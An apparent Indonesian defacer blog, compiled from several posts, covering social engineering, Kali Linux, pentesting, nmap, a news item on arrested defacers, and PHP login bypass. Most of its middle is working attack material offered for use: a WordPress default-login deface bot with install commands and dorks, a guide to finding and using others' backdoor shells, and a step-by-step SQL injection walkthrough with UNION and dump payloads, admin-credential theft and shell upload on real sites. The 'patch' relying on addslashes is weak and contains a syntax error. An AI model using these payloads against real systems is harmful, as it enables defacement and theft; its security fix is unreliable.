Akhir-akhir ini marak diberitakan adanya puluhan hacker yang bisa mengubah perhitungan suara sebuah lembaga independen. Maka istilah “Social Engineering” pun kembali mencuat. Tanpa ingin membuktikan apakah benar atau tidak berita tersebut, saya akan membahas bagaimana mungkin hal itu bisa terjadi. Hal ini penting agar Anda tidak menjadi korban dari social engineering.



Apa itu social engineering ?

Social engineering adalah kegiatan untuk mendapatkan informasi rahasia/penting dengan cara menipu pemilik informasi tersebut. Social engineering umumnya dilakukan melalui telepon dan Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu. Hal ini bisa dilakukan dengan pendekatan yang manusiawi melalui mekanisme interaksi sosial.

Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu MANUSIA. Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun.

Seperti metoda hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.



Memanfaatkan Kelemahan Manusia

Sebuah sistem keamanan yang baik, akan menjadi tidak berguna jika ditangani oleh administrator yang kurang kompeten. Selain itu, biasanya pada sebuah jaringan yang cukup kompleks terdapat banyak user yang kurang mengerti masalah keamanan atau tidak cukup peduli tentang hal itu. Ambil contoh di sebuah perusahaan, seorang network admin sudah menerapkan kebijakan keamanan dengan baik, namun ada user yang mengabaikan masalah kemanan itu. Misalnya user tersebut menggunakan password yang mudah ditebak, lupa logout ketika pulang kerja, atau dengan mudahnya memberikan akses kepada rekan kerjanya yang lain atau bahkan kepada kliennya. Hal ini dapat menyebabkan seorang penyerang memanfaatkan celah tersebut dan mencuri atau merusak data-data penting perusahaan.

Membuang sampah yang bagi kita tidak berguna, dapat dijadikan orang yang berkepentingan lain. Misal: slip gaji, slip atm. Barang tersebut kita buang karena tidak kita perlukan, namun ada informasi didalamnya yang bisa dimanfaatkan orang lain.

Atau pada kasus di atas, seorang penyerang bisa berpura-pura sebagai pihak yang berkepentingan dan meminta akses kepada salah satu user yang ceroboh tersebut. Tindakan ini digolongkan dalam Social Engineering.

Contoh titik lemah manusia yang bisa dimanfaatkan antara lain :

1. Rasa Takut – jika seorang pegawai atau karyawan dimintai data atau informasi dari atasannya, polisi, atau penegak hukum yang lain, biasanya yang bersangkutan akan langsung memberikan tanpa merasa sungkan;

2. Rasa Percaya – jika seorang individu dimintai data atau informasi dari teman baik, rekan sejawat, sanak saudara, atau sekretaris, biasanya yang bersangkutan akan langsung memberikannya tanpa harus merasa curiga;

3. Rasa Ingin Menolong – jika seseorang dimintai data atau informasi dari orang yang sedang tertimpa musibah, dalam kesedihan yang mendalam, menjadi korban bencana, atau berada dalam duka, biasanya yang bersangkutan akan langsung memberikan data atau informasi yang diinginkan tanpa bertanya lebih dahulu.



Target korban Social Engineering

Menurut studi dari data, secara statistik ada 5 (lima) kelompok individu yang kerap menjadi korban serangan social engineering, yaitu :

1. Receptionist dan/atau Help Desk sebuah perusahaan, karena merupakan pintu masuk ke dalam organisasi yang relatif memiliki data/informasi lengkap mengenai personel yang bekerja dalam lingkungan dimaksud

2. Pendukung teknis dari divisi teknologi informasi – khususnya yang melayani pimpinan dan manajemen perusahaan, karena mereka biasanya memegang kunci  akses penting ke data dan informasi rahasia, berharga, dan strategis

3. Administrator sistem dan pengguna komputer, karena mereka memiliki otoritas untuk mengelola manajemen password dan account semua pengguna teknologi informasi di perusahaan;

4. Mitra kerja atau vendor perusahaan yang menjadi target, karena mereka adalah pihak yang menyediakan berbagai teknologi beserta fitur dan kapabilitasnya yang dipergunakan oleh segenap manajemen dan karyawan perusahaan; dan

5. Karyawan baru yang masih belum begitu paham mengenai prosedur standar keamanan informasi di perusahaan.



Bagaimana cara melakukannya ?

Metode pertama adalah metode yang paling dasar dalam social engineering, dapat menyelesaikan tugas penyerang secara langsung yaitu, penyerang tinggal meminta apa yang diinginkannya: password, akses ke jaringan, peta jaringan, konfigurasi sistem, atau kunci ruangan. Memang cara ini paling sedikit berhasil, tapi bisa sangat membantu dalam menyelesaikan tugas penyerang.

Cara kedua adalah dengan menciptakan situasi palsu dimana seseorang menjadi bagian dari situasi tersebut. Penyerang bisa membuat alasan yang menyangkut kepentingan pihak lain atau bagian lain dari perusahaan itu, misalnya. Ini memerlukan kerja lanjutan bagi penyerang untuk mencari informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Ini juga berarti kita tidak harus selalu berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.

Sebagai contoh seperti ini: seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim. Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target. Contoh lain, bisa berpura-pura sedang mengadakan survei hardware dari vendor tertentu, dari sini bisa diperoleh informasi tentang peta jaringan, router, firewall atau komponen jaringan lainnya.

Cara yang populer sekarang adalah melalui e-mail, dengan mengirim e-mail yang meminta target untuk membuka attachment yang tentunya bisa kita sisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.

Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa dengan tindakan yang dilakukan akan menyebabkan sedikit atu tanpa efek buruk sama sekali. Atau target merasa bahwa dengan memenuhi keinginan penyerang-yang berpura-pura akan membuat dia dipuji atau mendapat kedudukan yang lebih baik. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain. Jadi kita bisa fokuskan untuk membujuk target secara sukarela membantu kita, tidak dengan memaksanya. Selanjutnya kita bisa menuntun target melakukan apa yang kita mau, target yakin bahwa dirinya yang memegang kontrol atas situasi tersebut. Target merasa bahwa dia membuat keputusan yang baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya. Semakin sedikit konflik semakin baik.



Social Engineering terhadap orang awam

Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan. Sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

Banyak metode yang dapat dilakukan untuk mencapai situasi psikologis yang tepat sebelum “serangan” dilancarkan. Yang umum adalah dilakukan dengan meniru orang lain, memuji, berpura-pura “eh kita sama”, atau sekedar benar-benar bersikap ramah terhadap sasaran.

Entah untuk Facebook, Twitter, atau email Anda. Anda yakin password Anda aman?

Anda tidak menggunakan tanggal lahir kan untuk password Anda?

Atau jangan-jangan Anda masih mencatat password Anda di secarik kertas?

Atau Anda sudah pastikan gak ada teman yang ngintip ketika Anda mengetikan password ?

Setelah Anda membaca cerita di atas, tidak perlu pengetahuan teknis tentang hacking kan untuk mendapatkan password Anda? Dan perlu disadari bahwa social engineering tidak hanya ditujukan untuk pencurian password saja; pembuat virus menggunakannya untuk membujuk Anda membuka attachment email yang mengandung malware, phishing dan menggunakanya untuk mendapatkan informasi berharga dari Anda, misal login ke internet banking, paypal kena limit dll. Bahkan ada pembuat scareware yang menakut-nakuti Anda untuk membeli atau mendownload program (yang bisa jadi tidak berguna, atau bahkan merusak)

Sebaiknya kita semua menyadari bahwa di era informasi digital ini tidak ada informasi yang sepele.

Apa itu Social Engginering?

•YO MINA~ BALIK LAGI SAMA GUA Hades :D DI ARTIKEL GUA KALI INI GUA PENGEN BAGI BAGI BOT DEFACE GRATIS NIH YANG LAGI RAMAI RAMAI NYA DI PAKAI PARA DEFACER :D YOK SIMAK BERIKUT INI.


DEFACE PROOF OF CONTEXT U/P DEFAULT WORDPRESS MEMANG SEDANG MARAK MARAK NYA (LAGI RAMAI) DI PAKAI OLEH PARA DEFACER. UNTUK KALIAN PARA PEMULA JANGAN KHAWATIR KALIAN BISA DAPAT TOOLS INI SECARA FREE. OH IYA NGOMONG-NGOMONG. TERIMAKASIH BUAT Jeager YANG SUDAH MEMBUAT TOOLS INI. OKE LANJUT

CARA INSTALISASI NYA GIMANA?

•INSTALISASI :
$https://github.com/jeager22xc/botWordpress.git

$apt install git -y

$git clone https://github.com/jeager22xc/botWordpress.git

$python botWordpress.py

(BANG BANG DORK NYA MANA BANG)

DORK : -inurl/wp/
              -intitle:My Blog My WordPress Blog

NANTI PAS MASUK TOOLS TIME NYA KETIK 0 DAN BAWAH NYA KETIK 100


OKE MINA MUNGKIN HANYA ITU YANG BISA KU BAGIKAN BUAT KALIAN, PANTENGIN BLOG KU TERUS YO~ AKAN ADA TUTORIAL ATAU ARTIKEL LAIN NYA YANG MENARIK.

Thanks to my Team : 22XploiterCrew
Thanks to Jeager : Jeager

ARIGATO >_<

Bot Deface u/p Default Wordpress


PENGERTIAN KALI LINUX

Kali linux bisa dikatakan Backtrack versi 6. Terus kenapa nama Backtrack diganti ? Dalam jawaban yang dijelaskan oleh Offensive Security tidak begitu Rinci namun perubahan yang terjadi karena sangat mendasar sekali dari sistem operasi yang digunakan. Jika dahulu sistem operasi Backtrack dibuat berdasarkan sistem operasi Ubuntu namun berbeda dengan kali linux yang saat ini menggunakan sistem operasi debian.
Kali linux pertama kali di rilis tanggal 13 maret 2013 dan terus mendapatkan pembaruan karena mengganti sistem operasi debian.



Baca Juga : Deface Poc Parked Domain Tebas Index



KELEBIHAN KALI LINUX

- Performa lebih stabil sebagai turunan dari Debian yang berbasis Wheezy
- Kali Linux Lebih sinkro dengan reposito Debian hingga 4 kali dalam sehari sehingga akan mengupdate package debian terbaru serta juga akan memperbaiki security Bugs.
- Kali Linux Dilengkapi oleh 300an lebih tools hacking dan penetration testing. Tools hacking dan Pentest tersebut sama dengan yang dimiliki Backtrack terdahulu.
- Gratis :D Linux Users tidak pernah di pungut biaya sepeserpun
- Kebal terhadap serangan virus, karena sistem keamannya tinggi
-Tampilan dinamis dan sangat nyaman dipakai. Kali linux dilengkapi oleh FHS complaint system memungkinkan linux Users mudah mencari library, file binary dan support file.


Baca Juga : Deface Poc Dorking Shell


KEKURANGAN KALI LINUX

- Program yang ada di windows tidak akan dapat berjalan di Sistem Operasi Kali Linux.
- Tidak semu distro inux dapat bekerja dengan semua perangkat keras komputer.
- Dalam hal penggunaannya sangat sedikit sekali user yang menggunakan OS Kali Linux kare program yang dapat dijalankan di dalam Os ini sangat sedikit.
- Tidak dapat membuka file yang berextensi .exe

Sebelum memakai Os Kali Linux sebaiknya anda belajar dahulu tentang hal yang diperlukan untuk menggunakan Os Kali Linux Ini.


MUNGKIN ITU SAJA INFO YANG BISA SAYA BERIKAN KURANG LEBIH NYA MOHON MAAF, JIKA ADA KEKURANGAN BISA COMMENT DI KOLOM KOMENTAR :D
SEE YOU MINA ~ Thx to My Team 22XploiterCrew


Pengertian Kali Linux Serta Kelebihan dan Kekurangannya

Yoo bangsad, Balik lagi sama w Hades Gans
Gausah banyak basa basi, langsung w turunin tutor nya

W mau share tutorial Dorking shell yang lagi viral viral nya di pake sama para hwkwr :V

Yok masuk ke inti nya

Bahan bahan :
- Otak lo yang isi nya bokep
- Dork
- Face yang handsome kek w

Pertama kalian dorking dulu

Dork :
intitle:/index of cgi.php intext:"64k"

#NOTE : cgi.php bisa di ubah jadi -lux.php , -zoz.php - db.php

Karena gua udah ada live target yang di kasih sama member gua jadi gua pake live target :D. Thx buat ./Bacotamat member 22XploiterCrew yang udah ngasih target.

Kalo udah dorking nanti bakalan masuk kaya gini

Nah muncul tuh shell cgi.php, Nanti langsung masuk shell backdoor nya deh :D lalu kalian upload shell kalian, terserah mau di apain juga hehe

Mungkin sekian tutorial dari gua, Asslamualaikum. Salam Hacker ๐Ÿ˜Ž๐Ÿ‘Š akaowkowkwok

Deface Poc Dorking Shell



Halo selamat malam/pagi/siang/sore :v para Hacker :v .. Setelah kemarin akhirnya selesai pasang Kali Linux, saya menjadi penasaran mengenai Sistem Operasi yang dikhususkan untuk pentest ini. Tetapi sebelumnya mungkin ada yang belum mengenal istilah pentest. Apa itu pentest ? Saya akan mencoba menjelaskan beberapa hal mengenai pentest.
1. Apa itu Penetration Testing ?
Penetration Testing (disingkat pentest) adalah suatu kegiatan dimana seseorang mencoba mensimulasikan serangan yang bisa dilakukan terhadap jaringan organisasi / perusahaan tertentu untuk menemukan kelemahan yang ada pada sistem jaringan tersebut. Orang yang melakukan kegiatan ini disebut penetration tester (disingkat pentester). Penetration Testing mempunyai standar resmi sebagai acuan dalam pelaksanaannya. Standar ini bisa dilihat di pentest-standard.org.
2. Kenapa Penetration Testing diperlukan ?
Nah kenapa kegiatan pentest diperlukan ? Perusahaan-perusahaan besar yang menyimpan data-data sensitif (seperti Bank) tentu tidak ingin jaringannya dibobol oleh orang tidak bertanggung jawab yang kemudian bisa mengambil alih kontrol jaringan dan menimbulkan kerugian yang sangat besar. Oleh karena alasan itu perusahaan menginvestasikan dana untuk memperkuat sistem jaringannya. Salah satu metode paling efektif adalah melakukan pentest. Dengan melakukan pentest, celah-celah keamanan yang ada dapat diketahui dan dengan demikian dapat diperbaiki secepatnya. Seorang pentester mensimulasikan serangan yang dapat dilakukan, menjelaskan resiko yang bisa terjadi, dan melakukan perbaikan sistem tanpa merusak infrastruktur jaringan perusahaan tersebut.
3. Tahapan Penetration Testing
Penetration Testing memiliki standar (PTES) yang digunakan sebagai acuan dalam pelaksanaanya yang dibagi ke dalam beberapa tahap :
  • Pre-engagement Interactions
Tahap dimana seorang pentester menjelaskan kegiatan pentest yang akan dilakukan kepada client (perusahaan). Disini seorang pentester harus bisa menjelaskan kegiatan-kegiatan yang akan dilakukan dan tujuan akhir yang akan dicapai.
  • Intelligence Gathering
Tahap dimana seorang pentester berusaha mengumpulkan sebanyak mungkin informasi mengenai perusahaan target yang bisa didapatkan dengan berbagai metode dan berbagai media. Hal yang perlu dijadikan dasar dalam pengumpulan informasi adalah : karakteristik sistem jaringan, cara kerja sistem jaringan, dan metode serangan yang bisa digunakan.
  • Threat Modeling
Tahap dimana seorang pentester mencari celah keamanan (vulnerabilities) berdasarkan informasi yang berhasil dikumpulkan pada tahap sebelumnya. Pada tahap ini seorang pentester tidak hanya mencari celah keamanan, tetapi juga menentukan celah yang paling efektif untuk digunakan.
  • Vulnerability Analysis
Tahap dimana seorang pentester mengkombinasikan informasi mengenai celah keamanan yang ada dengan metode serangan yang bisa dilakukan untuk melakukan serangan yang paling efektif.
  • Exploitation
Tahap dimana seorang pentester melakukan serangan pada target. Walaupun demikian tahap ini kebanyakan dilakukan dengan metode brute force tanpa memiliki unsur presisi. Seorang pentester profesional hanya akan melakukan exploitation ketika dia sudah mengetahui secara pasti apakah serangan yang dilakukan akan berhasil atau tidak. Namun tentu saja ada kemungkinan tidak terduga dalam sistem keamanan target. Walaupun begitu, sebelum melakukan serangan, pentester harus tahu kalau target mempunyai celah keamanan yang bisa digunakan. Melakukan serangan secara membabi-buta dan berharap sukses bukanlah metode yang produktif. Seorang pentester profesional selalu menyempurnakan analisisnya terlebih dahulu sebelum melakukan serangan yang efektif.
  • Post Exploitation
Tahap dimana seorang pentester berhasil masuk ke dalam sistem jaringan target dan kemudian melakukan analisis infrastruktur yang ada. Pada tahap ini seorang pentester mempelajari bagian-bagian di dalam sistem dan menentukan bagian yang paling critical bagi target (perusahaan). Disini seorang pentester harus bisa menghubungkan semua bagian-bagian sistem yang ada untuk menjelaskan dampak serangan / kerugian yang paling besar yang bisa terjadi pada target (perusahaan).
  • Reporting
Reporting adalah bagian paling penting dalam kegiatan pentest. Seorang pentester menggunakan report (laporan) untuk menjelaskan pada perusahaan mengenai pentesting yang dilakukan seperti : apa yang dilakukan, bagaimana cara melakukannya, resiko yang bisa terjadi dan yang paling utama adalah cara untuk memperbaiki sistemnya.
4. Tipe Penetration Testing
Ada dua jenis tipe pentest, yaitu : overt dan covertOvert pentest dilakukan dengan sepengetahuan perusahaan. Covert pentest dilakukan tanpa sepengetahuan perusahaan. Kedua tipe pentest ini memiliki kelebihan dan kelemahan satu sama lain.
  • Overt Penetration Testing
Pada overt pentest, seorang pentester bekerja bersama dengan tim IT perusahaan untuk mencari sebanyak mungkin celah keamanan yang ada. Salah satu kelebihannya adalah pentester mengetahui informasi sistem jaringan yang ada secara detail dan dapat melakukan serangan tanpa khawatir akan di-blok. Salah satu kelemahannya adalah tidak bisa menguji respon dari tim IT perusahaan jika terjadi serangan sebenarnya. Saat jumlah waktu dalam kegiatan pentest dibatasi, akan lebih efektif menggunakan tipe overt.
  • Covert Penetration Testing
Pada covert pentest, seorang pentester melakukan kegiatan pentest tanpa sepengetahuan perusahaan. Artinya tes ini digunakan untuk menguji respon dari tim IT perusahaan jika terjadi serangan sebenarnya. Covert test membutuhkan waktu yang lebih lama dan skill yang lebih besar daripada overt test. Kebanyakan pentester profesional lebih merekomendasikan covert test daripada overt test karena benar-benar mensimulasikan serangan yang bisa terjadi. Pada covert test, seorang pentester tidak akan berusaha mencari sebanyak mungkin celah keamanan, tetapi hanya akan mencari jalan termudah untuk masuk ke dalam sistem, tanpa terdeteksi.
Nah kira-kira seperti itulah kegiatan pentesting. Dengan semakin berkembangnya teknologi, unsur keamanan menjadi poin penting yang harus diperhatikan. Semakin sensitif data yang dimiliki perusahaan, maka akan semakin kuat juga sistem keamanan yang harus digunakan. Jika ada yang berminat untuk menjadi seorang pentester, maka kemampuan teknis networking dan programming, sangatlah diperlukan. Selain itu kita harus mempunyai analisis yang kuat untuk bisa mencari kelemahan sistem. Mungkin terlihat sangat sulit untuk menjadi seorang pentester, tetapi seperti quote terkenal : no pain no gain” ๐Ÿ™‚

SOUCE : KLIK KER

Apa itu Penetration Testing ?



TANGERANG, apostlemusiliministries.com-Petugas Direktorat Tindak Pidana Siber Bareskrim Polri menangkap CA dan AY, tersangka peretas atau deface (mengubah tampilan) situs Pengadilan Negeri Jakarta Pusat dengan alamat http://sipp.pn-jakartapusat.go.id/.

CA (24) ditangkap di daerah Kebagusan, Jakarta Selatan, Rabu (8/1/2020).

Sementara itu, AY (22) yang dikenal dengan nama "Konslet" diamankan di daerah Pramuka, Jakarta Pusat, Kamis (9/1/2020).

"Tersangka CA menggunakan laptop Asus milik tersangka AY dan jaringan WiFi setempat untuk melakukan aksinya tersebut," ujar Kasubdit I Direktorat Tindak Pidana Siber Bareskrim Polri Kombes Reinhard Hutagaol saat konferensi pers di Gedung Humas Mabes Polri, Jakarta Selatan, Senin (13/1/2020).

Reinhard mengatakan, tersangka AY awalnya menghubungi CA melalui media sosial terkait peretasan tersebut.
Tersangka AY tidak dapat menemukan titik lemah situs PN Jakpus sehingga meminta CA meretasnya. Setelah itu, AY mengubah tampilan situs tersebut.

"Aksi peretasan tersebut dilakukan sesuai permintaan tersangka AY kepada tersangka CA, sehingga tersangka AY dapat mengubah tampilan sesuai keinginannya," ujar dia.

Setelah peretasan dilakukan, AY memberi uang Rp 400.000 kepada CA.

Berdasarkan keterangan polisi, kedua pelaku belajar keahlian tersebut secara otodidak.

CA yang merupakan lulusan sekolah dasar ini merupakan pendiri komunitas Typical Idiot Security. Menurut polisi, ia telah meretas 3.896 situs sejak dua tahun lalu.

Kemudian, AY telah meretas 352 situs. Pendidikan terakhirnya di tingkat SMP.

Dari kedua pelaku, polisi menyita dua buah laptop, dua buah telepon genggam, 12 sim card, dan sebuah kartu identitas.

Para tersangka disangkakan Pasal 46 Ayat (1), (2), dan (3) jo Pasal 30 Ayat (1), (2) dan (3), Pasal 48 Ayat (1) jo Pasal 32 Ayat (1), (2), dan Pasal 49 Jo Pasal 33 Undang-Undang Nomor 19 Tahun 2016 tentang Perubahan Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik.


Para pelaku terancam hukuman maksimal 10 tahun penjara.

Sumber?KOMPAS.COM

Polisi Membekuk 2 Peretas Situs PN Jakarta Pusat



SQL INJECTION

Assalamu'alaikum
Ok kali ini saya akan share tutorial cara deface POC SQLi
Dikarenakan ada yang nanya "Bang share deface ini lah itulah alah mem*k :v"
Nah kali ini w akan share Tutorialnya
Ok Langsung saja pertama-tama kalian dorking dulu di google menggunakan Dork dibawah:
inurl:/home.php?page= site:com
inurl:/media.php?id=
inurl:/guru.php?id= site:sch.id
inurl:/events.php?id=
inurl:/play.php?id=
inurl:/detail.php?id=
Kembangkan dengan otak vokep atau waifu klean:v
Jika sudah kmudian kalian pilih salah satu target pilihan klean. jika sudah sekarang kalian harus memeriksa VULN atau tidak webtarget klean dengan menambahkan kutip dibellakang string target klean CONTOH:
http://webtarget.com/index.php?id=32
menjadi:
http://webtarget.com/index.php?id=32'
Jika muncul tulisan sql syntax error atau Mysql error berarti webtarget klean VULN
Jikaa tidak muncul cari web lain
Ok jika klean sudah menemukanya selanjutnya klean Tinggal melakukan sepperti dibawah ikuti saja
http://webtarget.com/index.php?id=32'+order+by+1--+
dan ganti angka 1 sampai strusnya smpai muncul tulisan error Column
atau kosong dari sebuah halaman tersbut
http://webtarget.com/index.php?id=32'+order+by+2--+[No error]
http://webtarget.com/index.php?id=32'+order+by+3--+[No error]
http://webtarget.com/index.php?id=32'+order+by+4--+[No error]
http://webtarget.com/index.php?id=32'+order+by+5--+[ ERROR ]
Nah kali ini saya mendapatkan pesan errornya di column 5
Berarti jumlah colum dalam web tersebut ada 4
OK SEKARANG waktunya kita akan mengubah ORDER sama BY menjadi UNION SELECT,, CONTOH:
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,2,3,4--+
Jika sudah maka akan muncul sebuah angka nah saya nemu angka 2 tinggal saya inject di column ke 2 dengan
dios dibawah kalian salin
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,
table_name,column_name)),@)

Dan angka 2 saya timpah dengan dios saya, Menjadi
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,table_
name,column_name)),@),3,4--+

Nah maka berhasil kita inject Web tersebut waktunya kita Dump dengan cara kalian pilih salah satu yang akan kalian buka misalkan kalian ingin mengetahui username ama pasword web tersebut,, karna tujuan kalian ingin mendeface^_^,, webnyamaka kalian cari table yang
berhubung menuju ke admin,, misalkan saya disini, columnya adallah admin dan Tablenya adalah [USERNAME_DAN PASWORD]
Maka kalian tinggal rubah dios yang tadi menjadi
make_set(6,@:=0x0a,(select(1)from(admin)where@:=
make_set(511,@,0x3c6c693e,
USER_NAME,PASWORD)),@)
DAN Selesai kalian sudah mendapatkan username dan pasword web tersebut Nah biasanya username ama paswordnya masih dalam bentuk md5.
Seperti angka acak gitulah
Atau biasanya ada yang langsung jadi, dan jika paswordnya bentuknya MD5 maka kalian hanya Tinggal HASH md5 tersebut DISINI
atau kalian juga bisa cari di google HASH Kiler di mbah gugel:v
Ok jika sudah kalian hash md5 tersebut dan menjadi username ama pasword yang benar seperti
user: admin23
pasword: kattie28
Maka langkah selanjutnya kalian hanya harus menemukan ADLOGNYA atau admin login sama saja ya, misalkan
http://webtarget.com/admin
seperti diatas jika masih tidak ketemu kalian ganti menjadi
http://webtarget.com/webadmin
sampai ketemu jika tidak kalian bisa cari menggunakan admin finder, kalian bisa mendowload nya di playstore oke?
Dan jika sudah ketemu kalian tinggal masukan username sama ppasword web tersebut dan LOGIN
Dan jika kalian berhasil masuk sekarang kalian hanya perlu mencari tempat uploadnya, cari sampai berhasil lo sudah menjadi admin gimanasi gblk:v
Dan jika menemukanya kalian hanya upload file shell kalian Lalu panggil dan ganti halaman depanya DONE:v
Mungkin cukup sekian tutorial dari saya kali ini jika ada salah kata mohon dimaafkan
Terimakasih.

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI >_<






































Tutorial SQLi Manual


Hallo Guys, Kali ini Autor akan membahas tentan scaner yang ada pada OS Kali Linux ( NMAP).

Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.





Cara Install Nmap
1. Install Winpcap versi 2.1 atau versi yang lebih baru, yaitu WinPcap_3_0.exe
2. Reboot
3. Download aplikasi Nmap terbaru dari www.nmap.org,
4. Unzip file tersebut menggunakan Winzip atau utility dekompresi lainnya.

Cara Menggunakan Nmap
Berikut beberapa contoh teknik yang dapat digunakan menggunakan nmap.

1. Memeriksa port yang terbuka
nmap<host/IP target>

2. Memeriksa spesifik port pada mesin target
nmap -p <host/IP target>

3. Memeriksa service yang berjalan pada port
nmap – sV <host/IP target>

4. Memeriksa port mesin target dalam 1 segmen jaringan
nmap <host/IP target>

5. Mengidentifikasi sistem operasi mesin
    nmap -O <host/IP target>

Contoh setelah kita melakukan nmap adalah sebagai berikut:

root@bt:~# nmap -p 1-65535 -sV -O 172.16.200.20
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-14 14:07 WIT
Nmap scan report for 172.16.200.20
Host is up (0.00052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds?
1025/tcp  open  msrpc         Microsoft Windows RPC
1026/tcp  open  msrpc         Microsoft Windows RPC
1029/tcp  open  msrpc         Microsoft Windows RPC
1031/tcp  open  msrpc         Microsoft Windows RPC
1032/tcp  open  msrpc         Microsoft Windows RPC
1033/tcp  open  msrpc         Microsoft Windows RPC
1091/tcp  open  ff-sm?
2869/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  ms-term-serv?
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
64141/tcp open  tcpwrapped
MAC Address: 70:71:BC:EC:EC:51 (Pegatron)
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS details: Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate
Network Distance: 1 hop
Service Info: OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.29 seconds
root@bt:~#


Sekian pembahasan tentang Nmap, Semoga Bermanfaat, Jangan Lupa di Share yaa

Author : ./Hades

BACA JUGA ARTIKEL TENTANG NMAP : TOUCH ME SENPAI >_<

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI :*

Fungsi Nmap Dan Cara Menggunakannya



Assalamualaikum Wr.Wb
    Ok Gan Kembali Lagi Dengan Gua ./Hades Kali Ini Gua Bakalan Share Tutorial Cara Membuat Anak:v Eh Maksud Gua Cara Patch Bypas Admin:v

       bypass admin adalah suatu kesalahan program pada sistem / system  apa itu bypass admin? bypass admin adalah suatu methode yang digunakan oleh peretas peretas dari dunia ini bypass admin ini digunakan para peretas untuk menginjek ehhh mksdnya menginject halaman admin pada sebuah website dengan sebuah exploit tertentu contoh exploit untuk bypass admin '=' 'or' nah sebagai exploit tertentu mereka bisa saja login ke admin web sebagai pemilik website pada website tertentu



oke langsung ke tutorialnya saja silahkan lihat script pada berikut ini


 <?php
 $message = “”;
if(isset($_POST[‘submit’])){
 $username= ($_POST[username]);
 $password = md5($_POST[‘password’]);
 $query = “SELECT * FROM admin WHERE username = ‘$username’ and password = ‘$password’ and usertype = ‘1’”;
 $query_result = mysqli_query($con, $query);
if(mysqli_num_rows($query_result)){
 $row = mysqli_fetch_assoc($query_result);
 $_SESSION[‘admin_id’] = $row[‘id’];
 $_SESSION[‘username’] = $row[‘username’];
 header(“location: index.php”);
 }else{
 $message = “Username and password is not matched.”;
 }
 }
 ?>
perhatikan pada bagian ini
 $username= ($_POST[username]);
Pada script di atas tidak terdapat filterisasi karakter yang mengakibatkan sebuah bug, sehingga hekel bisa mengexploit dengan memasukkan query inject sehingga mereka dapat login sebagai admin. Tapi jangan khawati karena saya akan memberikan solusinya.

3. Nah, untuk cara patchnya simpel kok, sekarang kita akan memfilter karakter  pada array nya tinggal ubah seperti script di bawah ini



 $username= addslashes($_POST[username]);


$username = htmlspecialchars(addslashes($_POST['username']),ENT_QUOTES);
$password = htmlspecialchars(addslashes($_POST['password'])),ENT_QUOTES;


fungsi addslashes adalah untuk merubah/menambahkan sebuah backslash(\) saat ada seseorang memasukkan sebuah string/karakter(').

